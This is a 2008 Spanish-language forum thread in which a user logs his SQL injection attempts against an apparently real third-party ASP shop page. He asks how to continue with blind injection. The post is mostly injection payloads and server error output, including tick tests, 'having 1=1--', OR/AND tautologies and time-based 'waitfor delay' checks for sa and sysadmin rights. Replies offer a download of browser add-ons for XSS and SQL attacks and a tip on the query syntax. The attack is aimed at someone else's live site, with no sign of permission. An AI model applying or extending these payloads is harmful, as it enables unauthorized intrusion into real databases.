SQL inj

Iniciado por Snap90210, 3 Marzo 2008, 03:28 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Snap90210

3 Marzo 2008, 03:28 AM
Hola a ver si alguien me puede ayudar con esto  :)

Encontre una vulnerabilidad y fui siguiendo esta guia q esta en internet, pero al final sigo perdido

la SQL inj esta en id="SQL", no pongo la url xq creo q aca no se pude poner, pero si alguien la quiere se la mando x pm

##############
# Inserting a tick #
##############

id='

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


#########################
# Identify a valid page #
#########################

id=10

Returns a valid page


################################
# Insert tick after valid page #
################################

id=10'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


###############################
# Tried to enum db table/column name #
###############################

Attempt with the tick

id=10' having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' having 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Attempt without the tick

Returns the following error:

id=10 having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'having'.

/lib/class/ListaProducto.asp, line 54



##################################
# Tried the AND 1=1-- and the OR 1=1-- #
##################################

Trying the AND 1=1--

id=10 AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'AND'.

/lib/class/ListaProducto.asp, line 54



Trying the OR 1=1--

id=10 or 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'or'.

/lib/class/ListaProducto.asp, line 54


Then tried them with the ticks

id=10' AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' AND 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54

id=10' OR 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' OR 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Trying to determine if the DB is running as SA
id=10; if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--

Returned page immediately so we know it's NOT running as SA



Trying to determine if it is a member of the SysAdmin group
id=10; if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--

Returned page immediately so we know it's NOT a member of the SysAdmin group


**

Que puedo hacer ahora, una SQL blind injection ? como se realiza ? use varios programas pero ninguno parece dar resultado, me recomendaron el SQLninja, pero no lo pude hacerlo andar, alguien me dice como se podria hacer manualmente ? o recomendarme un programa y como usarlo ?

desde ya muchas gracias ..

Shutdown -r

#1
29 Marzo 2008, 23:56 PM
Saludos Snap no se mucho de sql injection pero tengo aqui un programa (bueno no es un programa en si) que testea la pagina web y puedes atacarla median xss o sql, aqui te los dejo ->http://www.megaupload.com/?d=MRT122J1
IMPORTANTE: para poder usar eso necesitas el mozilla firefox, pues abres la ventana de complementos y añades hay esos dos archivitos, (como ya dije no es un programa xD).
   

Monaco

#2
10 Septiembre 2008, 15:37 PM

Snap90210 estoy en la misma... con MySql consigo injecciones facilmente, pero con MS SQL Server estoy perdido de como arrancar...

Tubiste algun avance??? a leer sobre Microsoft SQL no queda otra


saludos

Eazy

#3
11 Septiembre 2008, 00:27 AM
Proba todo lo qe dice justo despues de las palabras
Tried y Triying
[/url]

sirdarckcat

#4
19 Septiembre 2008, 08:56 AM
trata no comentando el resto de la query.. osea no pongas el "--" al final
Imprimir
Ir Arriba Páginas1
Acciones del Usuario